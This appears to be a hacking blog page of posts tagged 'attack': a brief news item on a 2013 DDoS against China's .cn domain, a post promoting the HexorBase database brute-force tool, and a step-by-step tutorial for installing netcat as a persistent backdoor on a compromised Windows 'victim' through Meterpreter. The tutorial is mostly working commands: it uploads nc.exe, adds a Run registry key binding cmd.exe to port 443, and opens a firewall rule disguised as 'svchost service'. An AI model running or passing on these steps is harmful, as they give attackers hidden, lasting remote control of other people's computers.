Showing posts with label attack. Show all posts
Showing posts with label attack. Show all posts

Monday, August 26, 2013

Massive DDoS attack on .cn domain brings down Chinese websites


China found itself on the receiving end of a massive denial-of-service attack this weekend that reportedly disrupted and slowed access to millions of websites, including major properties like Amazon.cn, Sina’s social networking site Weibo and Bank of China. According to the China Internet Network Information Center (CNNIC), the attack specifically targeted the country’s .cn servers, starting at around 2 a.m. local time on Sunday and followed by a more intense attack at 4 a.m. Service has been gradually restored since then.

Friday, June 22, 2012

Brute Force Database Servers with HexorBase


HexorBase is a database application designed for administering and auditing multiple database servers simultaneously from a centralized location, it is capable of performing SQL queries and bruteforce attacks against common database servers (MySQL, SQLite, Microsoft SQL Server, Oracle, PostgreSQL ).HexorBase allows packet routing through proxies or even metasploit pivoting antics to communicate with remotely inaccessible servers which are hidden within local subnets.
It works on Linux and Windows running the following:
Requirements:
python
python-qt4
cx_Oracle
python-mysqldb
python-psycopg2
python-pymssql
python-qscintilla2
To install simply run the following command in terminal after changing directory to the path were the downloaded package is:
Code:
root@host:~# dpkg -i hexorbase_1.0_all.deb
To get the source code for this project from SVN, here’s the checkout link:
Code:
root@host:~# svn checkout http://hexorbase.googlecode.com/svn/
Heres a video on how the program works
Download:

Install netcat as permanent backdoor using metasploit


When an attacker successfully compromise a system they need to maintain the connection, that’s why the attacker usually installing backdoor on victim computer for future use to make attacker easily connect to victim computer to use victim resource, and collecting data on victim computer.
Are you sure netcat can be used as a backdoor? yes sure of course :-)
In this tutorial I will write down the technique to set up the famous listener application NetCat as a backdoor for Windows system when attacker successfully compromised victim computer and gaining meterpreter access. This tutorial I will write based on gaining access using java signed applet exploit in my previous tutorial.

Requirements :

1. NetCat
2. Meterpreter Script (you can get meterpreter script when successfully compromise victim with selected payload)

Step By Step :

1. The first step you need to gain an access to victim computer and get a meterpreter script for the payload ( I’m using java signed applet from my previous tutorial).
Using NetCat as a Backdoor in Windows
2. The next step you need to upload your NetCat.exe to victim computer by using following command :
Code:
upload /pentest/windows-binaries/tools/nc.exe C:\\windows\\system32
 
upload nc.exe and place it in C:\windows\system32 on victim computer
Using NetCat as a backdoor in Windows system
When it failed to upload(look the picture above), you need to escalate your privilege to system account (view the tutorial privilege escalation here).
3. When upload process successful it will shown like this :
Using NetCat as a Backdoor for windows system
4. The next step we need to configure the registry to make NetCat execute on Windows start up and listening on port 443. We do this by editing the key “HKLM\software\microsoft\windows\currentversion\run“.
Enumerate the supplied registry key :
Code:
reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
Using netcat as a backdoor in windows system
5. Then add our NetCat into start up process by running this command :
Code:
meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe'
 
Successful set nc.
6. To check our backdoor autorun process and make sure it already added on autorun list :
Code:
reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc
Using NetCat as a backdoor in windows system
7. Until this step everything looks okay, for the next step we need to alter the system to allow remote connections through the firewall to our netcat backdoor using netsh command and open port 443 .
run shell command from meterpreter to access command prompt, and then run :
Code:
netsh advfirewall firewall add rule name="svchost service" dir=in action=allow protocol=TCP localport=443
Using NetCat as a backdoor in windows system
8. When success add our firewall rule, let’s check and make sure our new rule has been added or not by using this command :
Code:
netsh firewall show portopening
Using NetCat as a backdoor in windows system
9. Yep everything has been set up so great until this step, now we will run our netcat to try connect to victim computer by running :
Code:
nc -v victim_ip_address port
Using NetCat as a backdoor in windows system
10. Let’s try our backdoor by restarting the victim computer by using reboot command from meterpreter orshutdown -r -t 00 from windows console and try again to connect using NetCat in step 9.
Select AllCode:
meterpreter > reboot
 
or
 
C:\windows\system32>shutdown -r -t 00
If our netcat show up a console, then we’re successful inject a NetCat backdoor to victim computer.

Countermeasures :

1. When you have activated windows firewall, make sure you also have other personal firewall installed to detect inbound or outbound packet.
Hope it’s useful :-)